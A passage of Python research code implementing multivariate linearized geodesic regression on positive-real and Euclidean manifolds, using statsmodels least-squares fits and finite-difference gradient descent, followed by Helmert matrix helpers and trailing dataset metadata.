#################################################################################
def MultivariateLinearizedGeodesicRegression_PosReal_BottomUp( t_list, pt_list, cov_intercept_list, cov_slope_list=[], max_iter = 100, stepSize = 0.05, step_tol = 1e-8, useFrechetMeanAnchor = False, verbose=True ):
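# Same bottom-up scheme as the sphere version, specialized to the positive-real manifold type
# ( manifolds.pos_real / pos_real_tVec ).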
# The numbers
nGroup = len( t_list )
nData_group = []
for i in range( nGroup ):
nData_group.append( len( t_list[ i ] ) )
nParam_int = len( cov_intercept_list[ 0 ] )
nParam_slope = 0
if not len( cov_slope_list ) == 0:
nParam_slope = len( cov_slope_list[ 0 ] )
if verbose:
print( "=================================================================" )
print( " Linear Regression on Anchor Point Tangent Vector Space " )
print( "=================================================================" )
print( "No. Group : " + str( nGroup ) )
for i in range( nGroup ):
print( "Group " + str( i + 1 ) + " : " + str( nData_group[ i ] ) + " Obs." )
print( "No. Covariates for Intercept: " + str( nParam_int ) )
print( "No. Covariates for Slope: " + str( nParam_slope ) )
# Group-wise intercept, slope tangent vector, covariates (intercept/slope), time
p0_group_list = [] # 1-D Array N x 1
v_group_list = [] # 1-D Array N x 1
cov_intercept_group_list = [] # 2-D Array N x C_int
cov_slope_group_list = [] # 2-D Array N x C_slope
t_group_list = [] # 2-D Array N x O
for g in range( nGroup ):
t_list_g = t_list[ g ]
pt_list_g = pt_list[ g ]
p0_g, v_g = LinearizedGeodesicRegression( t_list_g, pt_list_g )
p0_group_list.append( p0_g )
v_group_list.append( v_g )
cov_intercept_group_list.append( cov_intercept_list[ g ] )
if not len( cov_slope_list ) == 0:
cov_slope_group_list.append( cov_slope_list[ g ] )
# # Check R2
# mean_g = FrechetMean( pt_list[ g ] )
# sqDist_SG_sum = 0
# sqVar_sum = 0
# for i in range( len( pt_list[ g ] ) ):
# p_i = pt_list_g[ i ]
# t_i = t_list_g[ i ]
# slope_t_i = v_g.ScalarMultiply( t_i )
# est_p_i = p0_g.ExponentialMap( slope_t_i )
# tVec_est_p_i_to_p_i = est_p_i.LogMap( p_i )
# sqDist_i = tVec_est_p_i_to_p_i.normSquared()
# sqDist_SG_sum += sqDist_i
# tVec_mean_to_p_n = mean_g.LogMap( p_i )
# sqVar_n = tVec_mean_to_p_n.normSquared()
# sqVar_sum += sqVar_n
# R2_SG = 1 - ( sqDist_SG_sum / sqVar_sum )
# print( "Subject : " + str( g ) )
# print( str( nData_group[ g ] ) + " Obs." )
# print( R2_SG )
##############################################
## Solve Intercepts Points w.r.t Covariates ##
##############################################
beta0, tangent_intercept_arr = MultivariateLinearizedGeodesicRegression_Intercept_PosReal( cov_intercept_group_list, p0_group_list, verbose=verbose )
##############################################
## Solve Tangent Vectors w.r.t Covariates ##
##############################################
tangent_slope_arr = MultivariateLinearizedGeodesicRegression_Slope_PosReal( cov_slope_group_list, v_group_list, beta0, p0_group_list, tangent_intercept_arr, verbose=verbose )
return beta0, tangent_intercept_arr, tangent_slope_arr
def MultivariateLinearizedGeodesicRegression_Intercept_PosReal( X, Y, max_iter = 100, stepSize = 0.05, step_tol = 1e-8, useFrechetMeanAnchor = False, verbose=True ):
# if verbose:
# print( "=================================================================" )
# print( " Linear Regression on Anchor Point Tangent Vector Space " )
# print( "=================================================================" )
# print( "No. Independent Varibles : " + str( len( X[ 0 ] ) ) )
# print( "No. Observations : " + str( len( X ) ) )
nData = len( Y )
nParam = len( X[ 0 ] )
if nParam == 0:
base = FrechetMean( Y )
tangent_arr = []
return base, tangent_arr
# The anchor point is chosen based on the last entry of the covariates
# A continuous variable, such as a genetic disease score, should be the last entry of the covariates
# If the data do not have a continuous covariate, the last entry can be a categorical covariate
t_list = []
for i in range( len( X ) ):
t_list.append( X[ i ][ -1 ] )
# Set an anchor point
t_min_idx = np.argmin( t_list )
p_anchor = Y[ t_min_idx ]
nManifoldDim = p_anchor.nDim
# Initial intercept point
init_Interp = manifolds.pos_real( nManifoldDim )
# Initial set of tangent vectors
init_tVec_arr = []
for i in range( nParam ):
init_tVec_arr.append( manifolds.pos_real_tVec( nManifoldDim ) )
base = init_Interp
tangent_arr = init_tVec_arr
# Iteration Parameters
prevEnergy = 1e10
prevBase = base
prev_tVec_arr = tangent_arr
for i in range( max_iter ):
tVec_list = []
w_list = []
for d in range( nManifoldDim ):
w_list.append( [] )
for j in range( nData ):
tVec_j = p_anchor.LogMap( Y[ j ] )
for d in range( nManifoldDim ):
w_list[ d ].append( tVec_j.tVector[ d ] )
estModel_list = []
for d in range( nManifoldDim ):
X_sm = sm.add_constant( X )
w_d_np = np.asarray( w_list[ d ] )
LS_model_d = sm.OLS( w_d_np, X_sm )
# est_d = LS_model_d.fit(method='qr')
est_d = LS_model_d.fit()
estModel_list.append( est_d )
if verbose:
print( est_d.summary() )
# Intercept point
v_to_base_on_p_anchor = manifolds.pos_real_tVec( nManifoldDim )
for d in range( nManifoldDim ):
v_to_base_on_p_anchor.tVector[ d ] = estModel_list[ d ].params[ 0 ]
newBase = p_anchor.ExponentialMap( v_to_base_on_p_anchor )
new_tVec_arr = []
for par in range( nParam ):
v_tangent_on_p_anchor_param = manifolds.pos_real_tVec( nManifoldDim )
for d in range( nManifoldDim ):
v_tangent_on_p_anchor_param.tVector[ d ] = estModel_list[ d ].params[ par + 1 ]
newTangent_param = p_anchor.ParallelTranslateAtoB( p_anchor, newBase, v_tangent_on_p_anchor_param )
new_tVec_arr.append( newTangent_param )
# Calculate energy to check if the model was minimized
energy = 0
for n in range( nData ):
target = Y[ n ]
current_tangent_VG_intercept = manifolds.pos_real_tVec( nManifoldDim )
current_tangent_VG_slope = manifolds.pos_real_tVec( nManifoldDim )
tangent_t_n = manifolds.pos_real_tVec( nManifoldDim )
for par in range( nParam ):
for d in range( nManifoldDim ):
tangent_t_n.tVector[ d ] += ( new_tVec_arr[ par ].tVector[ d ] * X[ n ][ par ] )
estimate_n = newBase.ExponentialMap( tangent_t_n )
et = estimate_n.LogMap( target )
# Energy of the tangential error
energy += et.normSquared()
if energy >= prevEnergy:
if verbose:
print( "=========================" )
print( " Energy Increased " )
print ( energy )
print( "=========================" )
break
else:
prevBase = newBase
prev_tVec_arr = new_tVec_arr
p_anchor = newBase
base = newBase
tangent_arr = new_tVec_arr
prevEnergy = energy
if verbose:
print( "==================================" )
print( str( i ) + "th Iteration " )
print( energy )
print( "==================================" )
if stepSize < step_tol:
if verbose:
print( "==================================" )
print( "Step size under tolerance")
print( "Aborting")
print( "==================================" )
break
return base, tangent_arr
def MultivariateLinearizedGeodesicRegression_Slope_PosReal( X, Y, beta0, p0_list, tVec_intercept_arr, verbose=True ):
# if verbose:
# print( "=================================================================" )
# print( " Linear Regression on Anchor Point Tangent Vector Space " )
# print( "=================================================================" )
if len( X ) == 0 or len( X[ 0 ] ) == 0 :
nManifoldDim = beta0.nDim
slope_tVec = manifolds.pos_real_tVec( nManifoldDim )
print( len( Y ) )
for i in range( len( Y ) ):
Y_i = Y [ i ]
if i == 0:
Y_i_tilde = Y_i
else:
Y_i_tilde = p0_list[ i ].ParallelTranslateAtoB( p0_list[i], beta0, Y_i )
print( "Y_i")
print( Y_i.tVector )
print( "Y_i_tilde")
print( Y_i_tilde.tVector )
for d in range( nManifoldDim ):
slope_tVec.tVector[ d ] += ( Y_i_tilde.tVector[ d ] / float( len( Y ) ) )
init_slope_tVec = slope_tVec
# Gradient Descent with eps
eps = 0.0001
stepSize = 0.01
stepTol = 1e-8
resTol = 1e-6
nIter = 500
prev_energy = 0
for i in range( len( Y ) ):
Y_i = Y[ i ]
slope_at_p_i = beta0.ParallelTranslateAtoB( beta0, p0_list[ i ], slope_tVec )
prev_energy_i = 0
for d in range( nManifoldDim ):
prev_energy_i += ( slope_at_p_i.tVector[ d ] - Y_i.tVector[ d ] )**2.0
prev_energy += prev_energy_i
energy_arr = []
for k in range( nIter ):
slope_tVec_updated = manifolds.pos_real_tVec( nManifoldDim )
for d in range( nManifoldDim ):
slope_tVec_updated.tVector[ d ] = slope_tVec.tVector[ d ]
# Calculate Gradient
dE = np.zeros( nManifoldDim )
energy_k = 0
# Calculate FDM
for d in range( nManifoldDim ):
slope_pos_eps = manifolds.pos_real_tVec( nManifoldDim )
slope_neg_eps = manifolds.pos_real_tVec( nManifoldDim )
for dd in range( nManifoldDim ):
slope_pos_eps.tVector[ dd ] = slope_tVec.tVector[ dd ]
slope_neg_eps.tVector[ dd ] = slope_tVec.tVector[ dd ]
slope_pos_eps.tVector[ d ] = slope_tVec.tVector[ d ] + eps
slope_neg_eps.tVector[ d ] = slope_tVec.tVector[ d ] - eps
for i in range( len( Y ) ):
Y_i = Y[ i ]
slope_parT_p_i = beta0.ParallelTranslateAtoB( beta0, p0_list[ i ], slope_tVec )
slope_pos_eps_at_p_i = beta0.ParallelTranslateAtoB( beta0, p0_list[ i ], slope_pos_eps )
slope_neg_eps_at_p_i = beta0.ParallelTranslateAtoB( beta0, p0_list[ i ], slope_neg_eps )
grad_slope_parT_fdm = manifolds.pos_real_tVec( nManifoldDim )
for dd in range( nManifoldDim ):
grad_slope_parT_fdm.tVector[ dd ] = float( slope_pos_eps_at_p_i.tVector[ dd ] - slope_neg_eps_at_p_i.tVector[ dd ] ) / float( 2.0 * eps )
print( "slope_pos_eps" )
print( slope_pos_eps.tVector )
print( "slope_neg_eps" )
print( slope_neg_eps.tVector )
print( "slope_pos_eps_p_i" )
print( slope_pos_eps_at_p_i.tVector )
print( "slope_neg_eps_p_i" )
print( slope_neg_eps_at_p_i.tVector )
print( "FDM tVector" )
print( grad_slope_parT_fdm.tVector )
slope_parT_minus_Y_i = manifolds.pos_real_tVec( nManifoldDim )
for dd in range( nManifoldDim ):
slope_parT_minus_Y_i.tVector[ dd ] = slope_parT_p_i.tVector[ dd ] - Y_i.tVector[ dd ]
dE[ d ] += grad_slope_parT_fdm.InnerProduct( slope_parT_minus_Y_i )
slope_tVec_updated.tVector[ d ] = slope_tVec.tVector[ d ] - ( stepSize * dE[ d ] )
# Calculate Energy
for i in range( len( Y ) ):
Y_i = Y[ i ]
slope_tVec_updated_at_p_i = beta0.ParallelTranslateAtoB( beta0, p0_list[ i ], slope_tVec_updated )
energy_k_i = 0
for d in range( nManifoldDim ):
energy_k_i += ( slope_tVec_updated_at_p_i.tVector[ d ] - Y_i.tVector[ d ] ) ** 2
energy_k += energy_k_i
if energy_k > prev_energy:
print( "Iteration : " + str( k + 1 ) )
print( "Energy Increased : Halve step size")
print( "Prev. Residual Energy" )
print( prev_energy )
energy_k = prev_energy
energy_arr.append( energy_k )
stepSize = stepSize / 2
else:
print( "Iteration : " + str( k + 1 ) )
print( "Residual Energy" )
print( energy_k )
stepSize = stepSize * 1.5
slope_tVec = slope_tVec_updated
prev_energy = energy_k
energy_arr.append( energy_k )
if energy_k < resTol:
print( "Energy Tolerance")
print( "# Iteration : " + str( k + 1 ) )
print( "Initial Slope" )
print( init_slope_tVec.tVector )
print( "Updated Slope" )
print( slope_tVec.tVector )
print( "Residual Energy" )
print( energy_k )
break
if stepSize < stepTol:
slope_tVec = slope_tVec_updated
print( "Step Size Tolerance")
print( "# Iteration : " + str( k + 1 ) )
print( "Initial Slope" )
print( init_slope_tVec.tVector )
print( "Updated Slope" )
print( slope_tVec.tVector )
print( "Residual Energy" )
print( energy_k )
break
if k == nIter - 1:
slope_tVec = slope_tVec_updated
print( "Initial Slope" )
print( init_slope_tVec.tVector )
print( "Updated Slope" )
print( slope_tVec.tVector )
print( "Residual Energy" )
print( energy_k )
tangent_arr = []
tangent_arr.append( slope_tVec )
plt.figure()
plt.plot( np.linspace( 1, k+1, num=k+1 ), energy_arr )
plt.show()
return tangent_arr
# print( "No. Independent Varibles : " + str( len( X[ 0 ] ) ) )
# print( "No. Observations : " + str( len( X ) ) )
nData = len( Y )
nParam = len( X[ 0 ] )
p_anchor = beta0
nManifoldDim = p_anchor.nDim
w_list = []
for d in range( nManifoldDim ):
w_list.append( [] )
for j in range( nData ):
# Parallel translate a group-wise tangent vector to population-level intercept
tVec_j = p0_list[ j ].ParallelTranslateAtoB( p0_list[ j ], p_anchor, Y[ j ] )
for d in range( nManifoldDim ):
w_list[ d ].append( tVec_j.tVector[ d ] )
estModel_list = []
for d in range( nManifoldDim ):
X_sm = sm.add_constant( X )
w_d_np = np.asarray( w_list[ d ] )
LS_model_d = sm.OLS( w_d_np, X_sm )
est_d = LS_model_d.fit()
estModel_list.append( est_d )
# if verbose:
# print( est_d.summary() )
# base slope for t
v_t = manifolds.pos_real_tVec( nManifoldDim )
for d in range( nManifoldDim ):
v_t.tVector[ d ] = estModel_list[ d ].params[ 0 ]
new_tVec_arr = []
for par in range( nParam ):
v_tangent_on_p_anchor_param = manifolds.pos_real_tVec( nManifoldDim )
for d in range( nManifoldDim ):
v_tangent_on_p_anchor_param.tVector[ d ] = estModel_list[ d ].params[ par + 1 ]
new_tVec_arr.append( v_tangent_on_p_anchor_param )
# Append time-wise slope tangent vector at the last
new_tVec_arr.append( v_t )
tangent_arr = new_tVec_arr
# # Calculate energy to check if the model was minimized
# energy = 0
# for n in range( nData ):
# target = Y[ n ]
# tangent_t_n = manifolds.sphere_tVec( nManifoldDim )
# for par in range( nParam ):
# for d in range( nManifoldDim ):
# tangent_t_n.tVector[ d ] += ( new_tVec_arr[ par ].tVector[ d ] * X[ n ][ par ] )
# estimate_n = p_anchor.ExponentialMap( tangent_t_n )
# et = estimate_n.LogMap( target )
# # Energy of the tangential error
# energy += et.normSquared()
# tangent_arr = new_tVec_arr
# if verbose:
# print( "==================================" )
# print( "Residual Energy " )
# print( energy )
# print( "==================================" )
return tangent_arr
#################################################################################
### Euclidean Numbers ###
#################################################################################
def MultivariateLinearizedGeodesicRegression_Euclidean_BottomUp( t_list, pt_list, cov_intercept_list, cov_slope_list=[], max_iter = 100, stepSize = 0.05, step_tol = 1e-8, useFrechetMeanAnchor = False, verbose=True ):
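# Same bottom-up scheme specialized to manifolds.euclidean; on a Euclidean space the exp / log maps
# presumably reduce to vector addition / subtraction, so the tangent-space fits coincide with
# ordinary multivariate linear regression.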
# The numbers
nGroup = len( t_list )
nData_group = []
for i in range( nGroup ):
nData_group.append( len( t_list[ i ] ) )
nParam_int = len( cov_intercept_list[ 0 ] )
nParam_slope = 0
if not len( cov_slope_list ) == 0:
nParam_slope = len( cov_slope_list[ 0 ] )
if verbose:
print( "=================================================================" )
print( " Linear Regression on Anchor Point Tangent Vector Space " )
print( "=================================================================" )
print( "No. Group : " + str( nGroup ) )
for i in range( nGroup ):
print( "Group " + str( i + 1 ) + " : " + str( nData_group[ i ] ) + " Obs." )
print( "No. Covariates for Intercept: " + str( nParam_int ) )
print( "No. Covariates for Slope: " + str( nParam_slope ) )
# Group-wise intercept, slope tangent vector, covariates (intercept/slope), time
p0_group_list = [] # 1-D Array N x 1
v_group_list = [] # 1-D Array N x 1
cov_intercept_group_list = [] # 2-D Array N x C_int
cov_slope_group_list = [] # 2-D Array N x C_slope
t_group_list = [] # 2-D Array N x O
for g in range( nGroup ):
t_list_g = t_list[ g ]
pt_list_g = pt_list[ g ]
p0_g, v_g = LinearizedGeodesicRegression( t_list_g, pt_list_g )
p0_group_list.append( p0_g )
v_group_list.append( v_g )
cov_intercept_group_list.append( cov_intercept_list[ g ] )
if not len( cov_slope_list ) == 0:
cov_slope_group_list.append( cov_slope_list[ g ] )
# # Check R2
# mean_g = FrechetMean( pt_list[ g ] )
# sqDist_SG_sum = 0
# sqVar_sum = 0
# for i in range( len( pt_list[ g ] ) ):
# p_i = pt_list_g[ i ]
# t_i = t_list_g[ i ]
# slope_t_i = v_g.ScalarMultiply( t_i )
# est_p_i = p0_g.ExponentialMap( slope_t_i )
# tVec_est_p_i_to_p_i = est_p_i.LogMap( p_i )
# sqDist_i = tVec_est_p_i_to_p_i.normSquared()
# sqDist_SG_sum += sqDist_i
# tVec_mean_to_p_n = mean_g.LogMap( p_i )
# sqVar_n = tVec_mean_to_p_n.normSquared()
# sqVar_sum += sqVar_n
# R2_SG = 1 - ( sqDist_SG_sum / sqVar_sum )
# print( "Subject : " + str( g ) )
# print( str( nData_group[ g ] ) + " Obs." )
# print( R2_SG )
##############################################
## Solve Intercepts Points w.r.t Covariates ##
##############################################
beta0, tangent_intercept_arr = MultivariateLinearizedGeodesicRegression_Intercept_Euclidean( cov_intercept_group_list, p0_group_list, verbose=verbose )
##############################################
## Solve Tangent Vectors w.r.t Covariates ##
##############################################
tangent_slope_arr = MultivariateLinearizedGeodesicRegression_Slope_Euclidean( cov_slope_group_list, v_group_list, beta0, p0_group_list, tangent_intercept_arr, verbose=verbose )
return beta0, tangent_intercept_arr, tangent_slope_arr
def MultivariateLinearizedGeodesicRegression_Intercept_Euclidean( X, Y, max_iter = 100, stepSize = 0.05, step_tol = 1e-8, useFrechetMeanAnchor = False, verbose=True ):
# if verbose:
# print( "=================================================================" )
# print( " Linear Regression on Anchor Point Tangent Vector Space " )
# print( "=================================================================" )
# print( "No. Independent Varibles : " + str( len( X[ 0 ] ) ) )
# print( "No. Observations : " + str( len( X ) ) )
nData = len( Y )
nParam = len( X[ 0 ] )
if nParam == 0:
base = FrechetMean( Y )
tangent_arr = []
return base, tangent_arr
# The anchor point is chosen based on the last entry of the covariates
# A continuous variable, such as a genetic disease score, should be the last entry of the covariates
# If the data do not have a continuous covariate, the last entry can be a categorical covariate
t_list = []
for i in range( len( X ) ):
t_list.append( X[ i ][ -1 ] )
# Set an anchor point
t_min_idx = np.argmin( t_list )
p_anchor = Y[ t_min_idx ]
nManifoldDim = p_anchor.nDim
# Initial intercept point
init_Interp = manifolds.euclidean( nManifoldDim )
# Initial set of tangent vectors
init_tVec_arr = []
for i in range( nParam ):
init_tVec_arr.append( manifolds.euclidean_tVec( nManifoldDim ) )
base = init_Interp
tangent_arr = init_tVec_arr
# Iteration Parameters
prevEnergy = 1e10
prevBase = base
prev_tVec_arr = tangent_arr
for i in range( max_iter ):
tVec_list = []
w_list = []
for d in range( nManifoldDim ):
w_list.append( [] )
for j in range( nData ):
tVec_j = p_anchor.LogMap( Y[ j ] )
for d in range( nManifoldDim ):
w_list[ d ].append( tVec_j.tVector[ d ] )
estModel_list = []
for d in range( nManifoldDim ):
X_sm = sm.add_constant( X )
w_d_np = np.asarray( w_list[ d ] )
LS_model_d = sm.OLS( w_d_np, X_sm )
# est_d = LS_model_d.fit(method='qr')
est_d = LS_model_d.fit()
estModel_list.append( est_d )
if verbose:
print( est_d.summary() )
# Intercept point
v_to_base_on_p_anchor = manifolds.euclidean_tVec( nManifoldDim )
for d in range( nManifoldDim ):
v_to_base_on_p_anchor.tVector[ d ] = estModel_list[ d ].params[ 0 ]
newBase = p_anchor.ExponentialMap( v_to_base_on_p_anchor )
new_tVec_arr = []
for par in range( nParam ):
v_tangent_on_p_anchor_param = manifolds.euclidean_tVec( nManifoldDim )
for d in range( nManifoldDim ):
v_tangent_on_p_anchor_param.tVector[ d ] = estModel_list[ d ].params[ par + 1 ]
newTangent_param = p_anchor.ParallelTranslateAtoB( p_anchor, newBase, v_tangent_on_p_anchor_param )
new_tVec_arr.append( newTangent_param )
# Calculate energy to check if the model was minimized
energy = 0
for n in range( nData ):
target = Y[ n ]
current_tangent_VG_intercept = manifolds.euclidean_tVec( nManifoldDim )
current_tangent_VG_slope = manifolds.euclidean_tVec( nManifoldDim )
tangent_t_n = manifolds.euclidean_tVec( nManifoldDim )
for par in range( nParam ):
for d in range( nManifoldDim ):
tangent_t_n.tVector[ d ] += ( new_tVec_arr[ par ].tVector[ d ] * X[ n ][ par ] )
estimate_n = newBase.ExponentialMap( tangent_t_n )
et = estimate_n.LogMap( target )
# Energy of the tangential error
energy += et.normSquared()
if energy >= prevEnergy:
if verbose:
print( "=========================" )
print( " Energy Increased " )
print ( energy )
print( "=========================" )
break
else:
prevBase = newBase
prev_tVec_arr = new_tVec_arr
p_anchor = newBase
base = newBase
tangent_arr = new_tVec_arr
prevEnergy = energy
if verbose:
print( "==================================" )
print( str( i ) + "th Iteration " )
print( energy )
print( "==================================" )
if stepSize < step_tol:
if verbose:
print( "==================================" )
print( "Step size under tolerance")
print( "Aborting")
print( "==================================" )
break
return base, tangent_arr
def MultivariateLinearizedGeodesicRegression_Slope_Euclidean( X, Y, beta0, p0_list, tVec_intercept_arr, verbose=True ):
# if verbose:
# print( "=================================================================" )
# print( " Linear Regression on Anchor Point Tangent Vector Space " )
# print( "=================================================================" )
if len( X ) == 0 or len( X[ 0 ] ) == 0 :
nManifoldDim = beta0.nDim
slope_tVec = manifolds.euclidean_tVec( nManifoldDim )
print( len( Y ) )
for i in range( len( Y ) ):
Y_i = Y [ i ]
if i == 0:
Y_i_tilde = Y_i
else:
Y_i_tilde = p0_list[ i ].ParallelTranslateAtoB( p0_list[i], beta0, Y_i )
print( "Y_i")
print( Y_i.tVector )
print( "Y_i_tilde")
print( Y_i_tilde.tVector )
for d in range( nManifoldDim ):
slope_tVec.tVector[ d ] += ( Y_i_tilde.tVector[ d ] / float( len( Y ) ) )
init_slope_tVec = slope_tVec
# Gradient Descent with eps
eps = 0.0001
stepSize = 0.01
stepTol = 1e-8
resTol = 1e-6
nIter = 500
prev_energy = 0
for i in range( len( Y ) ):
Y_i = Y[ i ]
slope_at_p_i = beta0.ParallelTranslateAtoB( beta0, p0_list[ i ], slope_tVec )
prev_energy_i = 0
for d in range( nManifoldDim ):
prev_energy_i += ( slope_at_p_i.tVector[ d ] - Y_i.tVector[ d ] )**2.0
prev_energy += prev_energy_i
energy_arr = []
for k in range( nIter ):
slope_tVec_updated = manifolds.euclidean_tVec( nManifoldDim )
for d in range( nManifoldDim ):
slope_tVec_updated.tVector[ d ] = slope_tVec.tVector[ d ]
# Calculate Gradient
dE = np.zeros( nManifoldDim )
energy_k = 0
# Calculate FDM
for d in range( nManifoldDim ):
slope_pos_eps = manifolds.euclidean_tVec( nManifoldDim )
slope_neg_eps = manifolds.euclidean_tVec( nManifoldDim )
for dd in range( nManifoldDim ):
slope_pos_eps.tVector[ dd ] = slope_tVec.tVector[ dd ]
slope_neg_eps.tVector[ dd ] = slope_tVec.tVector[ dd ]
slope_pos_eps.tVector[ d ] = slope_tVec.tVector[ d ] + eps
slope_neg_eps.tVector[ d ] = slope_tVec.tVector[ d ] - eps
for i in range( len( Y ) ):
Y_i = Y[ i ]
slope_parT_p_i = beta0.ParallelTranslateAtoB( beta0, p0_list[ i ], slope_tVec )
slope_pos_eps_at_p_i = beta0.ParallelTranslateAtoB( beta0, p0_list[ i ], slope_pos_eps )
slope_neg_eps_at_p_i = beta0.ParallelTranslateAtoB( beta0, p0_list[ i ], slope_neg_eps )
grad_slope_parT_fdm = manifolds.euclidean_tVec( nManifoldDim )
for dd in range( nManifoldDim ):
grad_slope_parT_fdm.tVector[ dd ] = float( slope_pos_eps_at_p_i.tVector[ dd ] - slope_neg_eps_at_p_i.tVector[ dd ] ) / float( 2.0 * eps )
print( "slope_pos_eps" )
print( slope_pos_eps.tVector )
print( "slope_neg_eps" )
print( slope_neg_eps.tVector )
print( "slope_pos_eps_p_i" )
print( slope_pos_eps_at_p_i.tVector )
print( "slope_neg_eps_p_i" )
print( slope_neg_eps_at_p_i.tVector )
print( "FDM tVector" )
print( grad_slope_parT_fdm.tVector )
slope_parT_minus_Y_i = manifolds.euclidean_tVec( nManifoldDim )
for dd in range( nManifoldDim ):
slope_parT_minus_Y_i.tVector[ dd ] = slope_parT_p_i.tVector[ dd ] - Y_i.tVector[ dd ]
dE[ d ] += grad_slope_parT_fdm.InnerProduct( slope_parT_minus_Y_i )
slope_tVec_updated.tVector[ d ] = slope_tVec.tVector[ d ] - ( stepSize * dE[ d ] )
# Calculate Energy
for i in range( len( Y ) ):
Y_i = Y[ i ]
slope_tVec_updated_at_p_i = beta0.ParallelTranslateAtoB( beta0, p0_list[ i ], slope_tVec_updated )
energy_k_i = 0
for d in range( nManifoldDim ):
energy_k_i += ( slope_tVec_updated_at_p_i.tVector[ d ] - Y_i.tVector[ d ] ) ** 2
energy_k += energy_k_i
if energy_k > prev_energy:
print( "Iteration : " + str( k + 1 ) )
print( "Energy Increased : Halve step size")
print( "Prev. Residual Energy" )
print( prev_energy )
energy_k = prev_energy
energy_arr.append( energy_k )
stepSize = stepSize / 2
else:
print( "Iteration : " + str( k + 1 ) )
print( "Residual Energy" )
print( energy_k )
stepSize = stepSize * 1.5
slope_tVec = slope_tVec_updated
prev_energy = energy_k
energy_arr.append( energy_k )
if energy_k < resTol:
print( "Energy Tolerance")
print( "# Iteration : " + str( k + 1 ) )
print( "Initial Slope" )
print( init_slope_tVec.tVector )
print( "Updated Slope" )
print( slope_tVec.tVector )
print( "Residual Energy" )
print( energy_k )
break
if stepSize < stepTol:
slope_tVec = slope_tVec_updated
print( "Step Size Tolerance")
print( "# Iteration : " + str( k + 1 ) )
print( "Initial Slope" )
print( init_slope_tVec.tVector )
print( "Updated Slope" )
print( slope_tVec.tVector )
print( "Residual Energy" )
print( energy_k )
break
if k == nIter - 1:
slope_tVec = slope_tVec_updated
print( "Initial Slope" )
print( init_slope_tVec.tVector )
print( "Updated Slope" )
print( slope_tVec.tVector )
print( "Residual Energy" )
print( energy_k )
tangent_arr = []
tangent_arr.append( slope_tVec )
plt.figure()
plt.plot( np.linspace( 1, k+1, num=k+1 ), energy_arr )
plt.show()
return tangent_arr
# print( "No. Independent Varibles : " + str( len( X[ 0 ] ) ) )
# print( "No. Observations : " + str( len( X ) ) )
nData = len( Y )
nParam = len( X[ 0 ] )
p_anchor = beta0
nManifoldDim = p_anchor.nDim
w_list = []
for d in range( nManifoldDim ):
w_list.append( [] )
for j in range( nData ):
# Parallel translate a group-wise tangent vector to population-level intercept
tVec_j = p0_list[ j ].ParallelTranslateAtoB( p0_list[ j ], p_anchor, Y[ j ] )
for d in range( nManifoldDim ):
w_list[ d ].append( tVec_j.tVector[ d ] )
estModel_list = []
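# Fit one ordinary least squares model per tangent-vector dimension; sm.add_constant prepends an
# intercept column, so params[ 0 ] is the intercept and params[ 1: ] are the covariate coefficients.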
for d in range( nManifoldDim ):
X_sm = sm.add_constant( X )
w_d_np = np.asarray( w_list[ d ] )
LS_model_d = sm.OLS( w_d_np, X_sm )
est_d = LS_model_d.fit()
estModel_list.append( est_d )
# if verbose:
# print( est_d.summary() )
# base slope for t
v_t = manifolds.euclidean_tVec( nManifoldDim )
for d in range( nManifoldDim ):
v_t.tVector[ d ] = estModel_list[ d ].params[ 0 ]
new_tVec_arr = []
for par in range( nParam ):
v_tangent_on_p_anchor_param = manifolds.euclidean_tVec( nManifoldDim )
for d in range( nManifoldDim ):
v_tangent_on_p_anchor_param.tVector[ d ] = estModel_list[ d ].params[ par + 1 ]
new_tVec_arr.append( v_tangent_on_p_anchor_param )
# Append time-wise slope tangent vector at the last
new_tVec_arr.append( v_t )
tangent_arr = new_tVec_arr
# # Calculate energy to check if the model was minimized
# energy = 0
# for n in range( nData ):
# target = Y[ n ]
# tangent_t_n = manifolds.sphere_tVec( nManifoldDim )
# for par in range( nParam ):
# for d in range( nManifoldDim ):
# tangent_t_n.tVector[ d ] += ( new_tVec_arr[ par ].tVector[ d ] * X[ n ][ par ] )
# estimate_n = p_anchor.ExponentialMap( tangent_t_n )
# et = estimate_n.LogMap( target )
# # Energy of the tangential error
# energy += et.normSquared()
# tangent_arr = new_tVec_arr
# if verbose:
# print( "==================================" )
# print( "Residual Energy " )
# print( energy )
# print( "==================================" )
return tangent_arr
###############################################################
#####   Miscellaneous   #####
###############################################################
def HelmertSubmatrix( nAtoms ):
# Create a Helmert submatrix - similarity-invariant
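# Row k holds k + 1 entries equal to h_k and one entry -( k + 1 ) * h_k, so every row sums to zero and
# the rows are orthonormal; applying H to landmark coordinates removes the centroid (translation) component.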
H = np.zeros( [ nAtoms - 1, nAtoms ] )
for k in range( nAtoms - 1 ):
h_k = -np.divide( 1.0, np.sqrt( ( k + 1 ) * ( k + 2 ) ) )
neg_kh_k = np.multiply( h_k, -( k + 1 ) )
for h in range( k + 1 ):
H[ k, h ] = h_k
H[ k, k + 1 ] = neg_kh_k
return H
def HelmertMatrix( nAtoms ):
# Create a Helmert matrix - similarity-invariant : First row - Center of Gravity (mass) (uniform mass of points)
H_full = np.zeros( [ nAtoms, nAtoms ] )
for h in range( nAtoms ):
H_full[ 0, h ] = np.divide( 1, np.sqrt( nAtoms ) )
for k in range( 1, nAtoms, 1 ):
h_k = -np.divide( 1.0, np.sqrt( ( k ) * ( k + 1 ) ) )
neg_kh_k = np.multiply( h_k, -k )
for h in range( k ):
H_full[ k, h ] = h_k
H_full[ k, k ] = neg_kh_k
return H_full
| 29.394525
| 253
| 0.642437
| 25,639
| 179,336
| 4.204337
| 0.018253
| 0.0313
| 0.029788
| 0.01694
| 0.936815
| 0.915237
| 0.900172
| 0.888149
| 0.873454
| 0.860763
| 0
| 0.015346
| 0.206428
| 179,336
| 6,100
| 254
| 29.399344
| 0.742088
| 0.144745
| 0
| 0.838594
| 0
| 0
| 0.064707
| 0.025643
| 0
| 0
| 0
| 0
| 0
| 1
| 0.024086
| false
| 0
| 0.001938
| 0.000277
| 0.065891
| 0.156977
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
4ecf533bd84460954ddb14e261ac689748acc28a
| 7,941
|
py
|
Python
|
soil/skeleton/migrations/0005_auto_20200319_1134.py
|
mahalsnz/terraprobe
|
e6579fbcd0d15982a24a29172b1e57830a54a4f6
|
[
"FSFAP"
] | 2
|
2021-06-22T22:03:21.000Z
|
2021-07-28T00:10:44.000Z
|
